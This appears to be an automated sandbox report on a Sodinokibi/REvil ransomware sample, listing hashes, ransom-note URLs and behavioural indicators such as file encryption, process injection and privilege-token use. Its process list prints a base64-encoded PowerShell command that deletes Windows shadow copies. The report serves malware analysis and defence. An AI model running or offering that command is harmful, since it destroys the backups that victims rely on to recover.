Analysis
-
max time kernel
143s -
max time network
148s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
20-08-2020 13:04
Static task
static1
Behavioral task
behavioral1
Sample
f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992.bin.exe.dll
Resource
win7
Behavioral task
behavioral2
Sample
f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992.bin.exe.dll
Resource
win10v200722
General
-
Target
f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992.bin.exe.dll
-
Size
116KB
-
MD5
53fd5fc16a31ab15167c9a804e3c7c14
-
SHA1
88b14c8f851f04c9d595ff3ae441bcf52489df08
-
SHA256
f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992
-
SHA512
085c5f4a8ec87c5b714cd8b4016170aa97ef80b2ec70a175f10e3a7e6c83b76aa30bcf76923cc2621fba42ee7015e452814b7d0f42f3de2146c2284a0145d3c0
Malware Config
Extracted
C:\r69548y0-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A66F0878FB3BF952
http://decryptor.cc/A66F0878FB3BF952
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Blacklisted process makes network request 94 IoCs
Processes:
rundll32.exeflow pid process 2 2716 rundll32.exe 5 2716 rundll32.exe 8 2716 rundll32.exe 12 2716 rundll32.exe 14 2716 rundll32.exe 21 2716 rundll32.exe 23 2716 rundll32.exe 25 2716 rundll32.exe 27 2716 rundll32.exe 29 2716 rundll32.exe 31 2716 rundll32.exe 33 2716 rundll32.exe 35 2716 rundll32.exe 37 2716 rundll32.exe 39 2716 rundll32.exe 41 2716 rundll32.exe 43 2716 rundll32.exe 45 2716 rundll32.exe 46 2716 rundll32.exe 47 2716 rundll32.exe 49 2716 rundll32.exe 51 2716 rundll32.exe 53 2716 rundll32.exe 55 2716 rundll32.exe 57 2716 rundll32.exe 59 2716 rundll32.exe 61 2716 rundll32.exe 62 2716 rundll32.exe 65 2716 rundll32.exe 66 2716 rundll32.exe 68 2716 rundll32.exe 69 2716 rundll32.exe 71 2716 rundll32.exe 75 2716 rundll32.exe 77 2716 rundll32.exe 79 2716 rundll32.exe 81 2716 rundll32.exe 83 2716 rundll32.exe 85 2716 rundll32.exe 87 2716 rundll32.exe 89 2716 rundll32.exe 91 2716 rundll32.exe 93 2716 rundll32.exe 95 2716 rundll32.exe 97 2716 rundll32.exe 99 2716 rundll32.exe 101 2716 rundll32.exe 103 2716 rundll32.exe 105 2716 rundll32.exe 108 2716 rundll32.exe 110 2716 rundll32.exe 112 2716 rundll32.exe 114 2716 rundll32.exe 116 2716 rundll32.exe 118 2716 rundll32.exe 120 2716 rundll32.exe 122 2716 rundll32.exe 124 2716 rundll32.exe 126 2716 rundll32.exe 128 2716 rundll32.exe 131 2716 rundll32.exe 133 2716 rundll32.exe 135 2716 rundll32.exe 137 2716 rundll32.exe -
Modifies extensions of user files 5 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
rundll32.exedescription ioc process File renamed C:\Users\Admin\Pictures\ConnectDebug.crw => \??\c:\users\admin\pictures\ConnectDebug.crw.r69548y0 rundll32.exe File renamed C:\Users\Admin\Pictures\SetMerge.tiff => \??\c:\users\admin\pictures\SetMerge.tiff.r69548y0 rundll32.exe File renamed C:\Users\Admin\Pictures\UnregisterOpen.crw => \??\c:\users\admin\pictures\UnregisterOpen.crw.r69548y0 rundll32.exe File renamed C:\Users\Admin\Pictures\WriteConfirm.raw => \??\c:\users\admin\pictures\WriteConfirm.raw.r69548y0 rundll32.exe File opened for modification \??\c:\users\admin\pictures\SetMerge.tiff rundll32.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
rundll32.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\9d29gzf42127.bmp" rundll32.exe -
Drops file in Program Files directory 28 IoCs
Processes:
rundll32.exedescription ioc process File created \??\c:\program files (x86)\r69548y0-readme.txt rundll32.exe File opened for modification \??\c:\program files\CloseRead.raw rundll32.exe File opened for modification \??\c:\program files\DenyTest.css rundll32.exe File opened for modification \??\c:\program files\ExitUnprotect.au rundll32.exe File opened for modification \??\c:\program files\SelectConnect.M2V rundll32.exe File opened for modification \??\c:\program files\AddReceive.pot rundll32.exe File opened for modification \??\c:\program files\ExportUpdate.wvx rundll32.exe File opened for modification \??\c:\program files\RestoreResize.htm rundll32.exe File opened for modification \??\c:\program files\SelectPublish.bmp rundll32.exe File opened for modification \??\c:\program files\SuspendUninstall.pcx rundll32.exe File opened for modification \??\c:\program files\ConnectRemove.temp rundll32.exe File opened for modification \??\c:\program files\FormatExport.ppsx rundll32.exe File opened for modification \??\c:\program files\PushGrant.bmp rundll32.exe File opened for modification \??\c:\program files\ShowStart.vb rundll32.exe File opened for modification \??\c:\program files\ConvertFromLock.wvx rundll32.exe File opened for modification \??\c:\program files\ExpandExport.shtml rundll32.exe File opened for modification \??\c:\program files\ReceiveMount.dwfx rundll32.exe File opened for modification \??\c:\program files\RepairConnect.jpe rundll32.exe File opened for modification \??\c:\program files\ResetDismount.rmi rundll32.exe File opened for modification \??\c:\program files\ResumeSync.dwfx rundll32.exe File opened for modification \??\c:\program files\SearchResize.m4a rundll32.exe File opened for modification \??\c:\program files\ConvertStep.jpeg rundll32.exe File opened for modification \??\c:\program files\InvokeWait.vbe rundll32.exe File opened for modification \??\c:\program files\NewUse.aif rundll32.exe File opened for modification \??\c:\program files\SendLimit.ttf rundll32.exe File created \??\c:\program files\r69548y0-readme.txt rundll32.exe File opened for modification \??\c:\program files\SendSuspend.vsdx rundll32.exe File opened for modification \??\c:\program files\ResizeSelect.svgz rundll32.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
rundll32.exepowershell.exepid process 2716 rundll32.exe 2716 rundll32.exe 3268 powershell.exe 3268 powershell.exe 3268 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
rundll32.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2716 rundll32.exe Token: SeDebugPrivilege 3268 powershell.exe Token: SeBackupPrivilege 1852 vssvc.exe Token: SeRestorePrivilege 1852 vssvc.exe Token: SeAuditPrivilege 1852 vssvc.exe Token: SeTakeOwnershipPrivilege 2716 rundll32.exe -
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
rundll32.exerundll32.exedescription pid process target process PID 3980 wrote to memory of 2716 3980 rundll32.exe rundll32.exe PID 3980 wrote to memory of 2716 3980 rundll32.exe rundll32.exe PID 3980 wrote to memory of 2716 3980 rundll32.exe rundll32.exe PID 2716 wrote to memory of 3268 2716 rundll32.exe powershell.exe PID 2716 wrote to memory of 3268 2716 rundll32.exe powershell.exe
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992.bin.exe.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:3980 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\f97175fdad804a02e6f24273b371184d816044eb2409dadaad683c07fd41e992.bin.exe.dll,#12⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3268
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:644
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1852